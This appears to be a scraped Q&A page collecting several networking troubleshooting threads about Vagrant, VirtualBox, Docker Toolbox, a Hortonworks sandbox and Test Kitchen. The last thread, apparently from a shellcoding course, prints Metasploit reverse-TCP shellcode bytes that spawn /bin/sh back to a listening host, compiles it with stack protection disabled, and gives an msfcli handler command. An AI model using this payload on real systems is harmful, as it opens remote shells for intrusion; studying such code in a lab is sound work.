can't reach vagrant box over private network - macos

My vagrant box stop working for unknown reason and even if a reinstall all the box trough my ansible script, it don't want to be reached by http://192.168.33.10/.
here my vagrant file :
Vagrant.configure(2) do |config|
config.vm.box = "centos67vm"
config.vm.synced_folder "../../pjt" , "/var/www/pjt", owner: "pjt", group: "pjt", mount_options: ["dmode=777,fmode=777"]
config.vm.synced_folder "../../library" , "/var/library"
config.vm.network :private_network, ip: "192.168.33.10"
config.vm.provision :shell, path: "ansible.sh"
config.vm.provider :virtualbox do |vb|
vb.name = "dev-pjt"
end
end
when i ping the ip i got :
ping 192.168.33.10
PING 192.168.33.10 (192.168.33.10): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
Request timeout for icmp_seq 3
Request timeout for icmp_seq 4
^C
--- 192.168.33.10 ping statistics ---
6 packets transmitted, 0 packets received, 100.0% packet loss
the ifconfig in the box give me that :
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:1B:2F:CC
inet adr:10.0.2.15 Bcast:10.0.2.255 Masque:255.255.255.0
adr inet6: fe80::a00:27ff:fe1b:2fcc/64 Scope:Lien
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:967 errors:0 dropped:0 overruns:0 frame:0
TX packets:635 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:1000
RX bytes:100532 (98.1 KiB) TX bytes:85600 (83.5 KiB)
eth1 Link encap:Ethernet HWaddr 08:00:27:2A:FE:79
inet adr:192.168.33.10 Bcast:192.168.33.255 Masque:255.255.255.0
adr inet6: fe80::a00:27ff:fe2a:fe79/64 Scope:Lien
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:27 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:1000
RX bytes:0 (0.0 b) TX bytes:1974 (1.9 KiB)
lo Link encap:Boucle locale
inet adr:127.0.0.1 Masque:255.0.0.0
adr inet6: ::1/128 Scope:Hôte
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
i'm don't know where do i need to dig in to find a solution (my mac or virtualbox ?) , hope somebody can help me.

Finally resolve the problem... but don't know how... so here the steps that i did :
sudo route -n flush
rebooted the macbook
deactivated little snitch and nod32 antivirus
vagrant up
successfully ping and go to http://192.168.33.10/
vagrant halt
reactivated little snitch and nod32 antivirus
vagrant up
successfully ping and go to http://192.168.33.10/
i don't know if it's the "sudo route -n flush" or the reboot that made the connection work again.
hope it will help somebody ;)

Related

Virtualbox - can't use internet on terminal

I have a Linux Mint in a virtualbox VM and I'm able to use Internet through browser. However, when I've tried to use the command wget www.google.com, for example, the results is
$ wget www.google.com
--2018-12-03 16:46:10-- http://www.google.com/
Resolving www.google.com (www.google.com)... 2800:3f0:4001:810::2004,
172.217.28.4
Connecting to www.google.com
(www.google.com)|2800:3f0:4001:810::2004|:80...
I've checked the issue No internet in terminal . But, unfortunatelly appears as an specific proxy problem and that's not my case.
My VM network config
I know! Portuguese...
Basicaly, the connection type is set on "Bridge"
And "promiscuous" mode is set as 'Allow everything'.
There is no other adaptor configuration.
Result of command ifconfig
enp0s3 Link encap:Ethernet HWaddr 08:00:27:2b:04:c7
inet addr:192.168.0.39 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: 2804:14d:c092:4057:6d41:5685:4959:c973/64 Scope:Global
inet6 addr: 2804:14d:c092:4057::1005/128 Scope:Global
inet6 addr: fe80::da8c:1d0b:592d:5c90/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14289 errors:0 dropped:0 overruns:0 frame:0
TX packets:9307 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15589075 (15.5 MB) TX bytes:938043 (938.0 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:776 errors:0 dropped:0 overruns:0 frame:0
TX packets:776 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:66576 (66.5 KB) TX bytes:66576 (66.5 KB)
Linux Mint network config
Thanks to #darnir, I figured out how to make a 'workaround' to solve this problem! Basicaly, I had to add some 'aliases' for wget and apt-get in my .bashrc file and edit /etc/sysctl.conf
Aliases on ~/.bashrc:
# alias for wget force connection through ipv4
alias wget='wget -4 '
# alias for apt-get force connections through ipv4
apt-get='apt-get -o Acquire::ForceIPv4=true
Editing on /etc/sysctl.conf (Remember this solution is implemented over Linux Mint distro)
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
To restart systcl:
sudo sysctl -p
Or, you can use -w in sysctl command directly. But you'll lost this config as soon as you end the terminal session:
sysctl -w net.ipv6.conf.all.disable_ipv6=1
sysctl -w net.ipv6.conf.default.disable_ipv6=1
sysctl -w net.ipv6.conf.lo.disable_ipv6=1
WARNING this is not a good solution because is not comprehensive to all system. The problem appearently is the algorithms to resolve IPv6 is just too slow to perform properly in VMs( at least in common machines ). If someone has another idea please, post it! :D

HortonWorks Hadoop Sandbox and Tableau

I am attempting to connect Tableau to the HortonWorks Hadoop sandbox as described here: http://hortonworks.com/kb/how-to-connect-tableau-to-hortonworks-sandbox/
Tableau is able to see the virtual server as a data source, and it accurately lists the available Schemas and Tables.
However, when attempting to select any table or preview it's data, it displays an error popup that 'An error has occurred while loading the data. No such table [default].[tablename]' where default is the schema and tablename is the name of the table I'm attempting to view.
Here is what comes back when I run ifconfig from the Terminal window in the vm sandbox. Tableau is connecting to the vm via 192.168.50.128.
eth3 Link encap:Ethernet HWaddr 00:0C:29:EB:B9:DC
inet addr:192.168.50.128 Bcast:192.168.50.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feeb:b9dc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:42011 errors:0 dropped:0 overruns:0 frame:0
TX packets:9750 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15123871 (14.4 MiB) TX bytes:4019795 (3.8 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5185579 errors:0 dropped:0 overruns:0 frame:0
TX packets:5185579 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2054785522 (1.9 GiB) TX bytes:2054785522 (1.9 GiB)
The guide states Enter the IP address of the Sandbox VM (typically 192.168.56.101) which is different.
Is this IP difference the source of the issue or is there something else I've overlooked? Im assuming that since it can see the schema and tables that this wouldn't matter.
Turns out this was a permissions issue which I was able to resolve by following this guide: http://diveintobigdata.blogspot.com/2015/10/error-occurred-executing-hive-query.html
However, everywhere I was told to input localhost, such as when accessing Ambari, I had to replace localhost with 192.168.50.128 which I mentioned above is the IP I saw when executing ifconfig in the terminal.
Also, in step 1 of the guide there should not be any spaces in the file paths that were provided.

How to access a docker container running on MacOSX from another host?

I'm trying to get started with docker and want to run the Ubiquiti video controller. I have installed Docker Toolbox and managed to get the container to run on my Yosemite host and can access it on the same mac by going to the IP returned by docker-machine ip default. But I want to access it on other machines on the network and eventually set up port forwarding on my home router so I can access it outside my home network.
As suggested in boot2docker issue 160, using the Virtualbox GUI I was able to add a bridged network adaptor, but after restarting the VM docker-machine can no longer connect with the VM. docker env default hangs for a long time but eventually returns some environment variables along with the message Maximum number of retries (60) exceeded. When I set up the shell with those variables and try to run docker ps I get the error: An error occurred trying to connect: Get https://10.0.2.15:2376/v1.20/containers/json: dial tcp 10.0.2.15:2376: network is unreachable.
I suspect that docker-machine has some assumptions about networking configuration in the VM and I'm mucking them up.
docker-machine ssh ifconfig -a returns the following:
docker0 Link encap:Ethernet HWaddr 02:42:86:44:17:1E
inet addr:172.17.42.1 Bcast:0.0.0.0 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
dummy0 Link encap:Ethernet HWaddr 96:9F:AA:B8:BB:46
BROADCAST NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 Link encap:Ethernet HWaddr 08:00:27:37:2C:75
inet addr:192.168.1.142 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe37:2c75/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2996 errors:0 dropped:0 overruns:0 frame:0
TX packets:76 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:278781 (272.2 KiB) TX bytes:6824 (6.6 KiB)
Interrupt:17 Base address:0xd060
eth1 Link encap:Ethernet HWaddr 08:00:27:E8:38:7C
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee8:387c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:767 errors:0 dropped:0 overruns:0 frame:0
TX packets:495 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122291 (119.4 KiB) TX bytes:116118 (113.3 KiB)
eth2 Link encap:Ethernet HWaddr 08:00:27:A4:CF:12
inet addr:192.168.99.100 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fea4:cf12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:430 errors:0 dropped:0 overruns:0 frame:0
TX packets:322 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:53351 (52.1 KiB) TX bytes:24000 (23.4 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 seems to be getting a reasonable DHCP address from my router.
I'm not sure whether this is the right approach or whether I'm barking up the wrong tree. If I can get the bridged network adaptor working on the VM, I don't know how to then convince my docker container to use it. I've tried searching high and low on the internet. I've found dozens of sites that explain how you need to access the container using the value of docker-machine ip default rather than localhost but nothing to explain how to access from a different host. Maybe I need to improve my googling skills.
This working for me
with stopped VM add a 3rd "bridge" network
start the VM with docker-machine start machine-name
regenerate certs with docker-machine regenerate-certs machine-name
check if ok with docker-machine ls
OK, so I found a better way to do it than trying to use a bridging network adaptor. I found it in the boot2docker docs on port forwarding.
Just use VBoxManage modifyvm default --natpf1 "my_web,tcp,,8080,,80"
or use the VirtualBox GUI to specify your port forwarding for the NAT adaptor.
Then, remove the -p option from your docker run command and use --net=host instead. That is instead of
docker run -d -p 8080:80 --name=web nginx
use
docker run -d --net=host --name=web nginx
And voila! Your web server is available at localhost:8080 on your host or YOURHOSTIP:8080 elsewhere on your LAN.
Note that using --net=host may mess up communication between containers on the VM, but since this is the only container I plan to run, it works great for me.
On a machine with Docker Toolbox for Mac, I'm solving the problem as follows (using the default machine).
Preparation
Stop the machine if it's running:
docker-machine stop default
VirtualBox Setup
Open VirtualBox, select the default machine, open Settings (Cmd-S), go to Network, and select "Adapter 3".
Check "Enable Network Adapter" (turn it on).
Set "Attached to" to "Bridged Adapter".
Set Name to "en0: Ethernet" (or whatever is the primary network interface or your Mac).
Disclose "Advanced", and make sure "Cable Connected" is checked on.
Note the "MAC Address" of "Adapter 3" (we'll use it later).
Press "OK" to save the settings.
Docker Setup
Now, back in Terminal, start the machine:
docker-machine start default
Just in case, regenerate the certs:
docker-machine regenerate-certs default
Update the environment:
eval $(docker-machine env default)
At this point, the machine should be running (with the default IP address of 192.168.99.100, accessible only from the hosting Mac). However, if you ssh into the docker VM (docker-machine ssh default) and run ifconfig -a, you'll see that one of the VM's interfaces (eth0 in my case) has an IP in the same network as your Mac (e.g. 192.168.0.102), which is accessible from other devices on your LAN.
Router Setup
Now, the last step is to make sure this address is fixed, and not changed from time to time by your router's DHCP. This may differ from router to router, the following applies to my no-frills TP-LINK router, but should be easily adjustable to other makes and models.
Open your router settings, and first check that default is in the router's DHCP Clients List, with the MAC address from step 7 above.
Open "DHCP" > "Address Reservation" in the router settings, and add the "Adapter 3" MAC Address (you may have to insert the missing dashes), and your desired IP there (e.g. 192.168.0.201).
Now my router asks me to reboot it. After the reboot, run docker-machine restart default for the Docker VM to pick up its new IP address.
Final verification: docker-machine ssh default, then ifconfig -a, and find your new IP address in the output (this time the interface was eth1).
Result
From the hosting Mac the machine is accessible via two addresses (192.168.99.100 and 192.168.0.201); from other devices in the LAN it's accessible as 192.168.0.201.
This question main use case would be to access the applications running in the container from host(Mac) machine or other machines in the host(Mac) network
Once the container application has been started and exposed as below
docker run -d -p 8080 <<image-name>>
Then find the mapping between the host(Mac) port with container port as below
docker port <<container-name>>
sample output : 8080/tcp -> 0.0.0.0:32771
now access the container application as host(Mac IP):32771 from any machine in your host(Mac) network
If I change the first network card from NAT to bridge I also can't connect to it.
What I have found working was to add 3rd network card, set it up to bridge mode and change adapter type to the Intel PRO/1000 MT Desktop (82540EM). The default one is probably not supported by boot2docker distro.
See my comment at github.

Kitchen can't see the network configuration into Vagrantfile

I am using kitchen to test my cookbook and I made a network configuration in the Vagrantfile but the kitchen instance not see this configuration.
This is my Vagrantfile configuration.
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
config.vm.hostname = "demo-berkshelf"
config.vm.box = "ubuntu-12.04"
config.vm.network :private_network, ip: "33.33.33.10"
config.berkshelf.enabled = true
config.vm.provision :chef_solo do |chef|
chef.json = {
:mysql => {
:server_root_password => 'rootpass',
:server_debian_password => 'debpass',
:server_repl_password => 'replpass'
}
}
chef.run_list = [
"recipe[demo::default]"
]
end
end
And it is my .kitchen.yml configuration.
---
driver:
name: vagrant
provisioner:
name: chef_solo
platforms:
- name: ubuntu-12.04
driver_config:
box: "ubuntu-12.04"
suites:
- name: default
run_list:
- recipe[demo::default]
attributes:
When i login into kitchen show me a network configuration that i don't expect
roberto#rcisla-pc:~$ kitchen login default-ubuntu-1204
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
Welcome to your Vagrant-built virtual machine.
Last login: Wed Jan 22 14:02:59 2014 from 10.0.2.2
vagrant#default-ubuntu-1204:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:12:96:98
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe12:9698/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:360 errors:0 dropped:0 overruns:0 frame:0
TX packets:365 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:49328 (49.3 KB) TX bytes:42004 (42.0 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Where is the 33.33.33.10 that i configured in Vagrantfile?
Thanks beforehand for any help.
Test Kitchen won't use your Vagrantfile by default; it generates its own based on the .kitchen.yml. See the README for instructions how to configure networking via it. For example:
driver:
name: vagrant
network:
- ["private_network", { ip: "192.168.33.10" }]
You can use a custom Vagrantfile template too, but normally it shouldn't be needed. See the default template for an example.
And finally, don't use 33.33.33.* addresses. That is a valid network owned by somebody. Use IPs from private networks like 10.0.0.0/8 or 192.168.0.0/16 instead. 192.168.33.* seems to be quite common with Vagrant.

How to run the linux/x86/shell_reverse_tcp payload stand alone?

I'm trying to run the linux/x86/shell_reverse_tcp payload. If I look at the summary of the payload it seems like a host and port are the two requirements, shown below.
max#ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_reverse_tcp S
Name: Linux Command Shell, Reverse TCP Inline
Module: payload/linux/x86/shell_reverse_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 190
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle#metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Because I'm running this on the local host I used ifconfig to find my local ip address. It seems to be 10.0.1.38, shown below
max#ubuntu-vm:~/SLAE/mod2$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:bf:ec:33
inet addr:10.0.1.38 Bcast:10.0.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:febf:ec33/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7866 errors:0 dropped:0 overruns:0 frame:0
TX packets:5066 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3043939 (3.0 MB) TX bytes:1149171 (1.1 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:310 errors:0 dropped:0 overruns:0 frame:0
TX packets:310 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:29143 (29.1 KB) TX bytes:29143 (29.1 KB)
So I use the msfpayload command to output the shellcode, put it in my shellcode sand box, and compile
max#ubuntu-vm:~/SLAE/mod2$ sudo msfpayload \
-p linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 C
/*
* linux/x86/shell_reverse_tcp - 68 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=10.0.1.38, LPORT=3333,
* ReverseConnectRetries=5, ReverseAllowProxy=false,
* PrependFork=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependSetresgid=false, PrependSetregid=false,
* PrependSetgid=false, PrependChrootBreak=false,
* AppendExit=false, InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
max#ubuntu-vm:~/SLAE/mod2$ gcc \
-fno-stack-protector -z execstack -o shellcode shellcode.c
So all seems well, except then when I try to run the payload I get a segmentation fault. So my question is how would I run this payload successfully?
max#ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 26
Segmentation fault (core dumped)
max#ubuntu-vm:~/SLAE/mod2$
It's a reverse_shell, it needs something to connect to.
You have to configure and create a reverse_handler, something like this:
# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E

Resources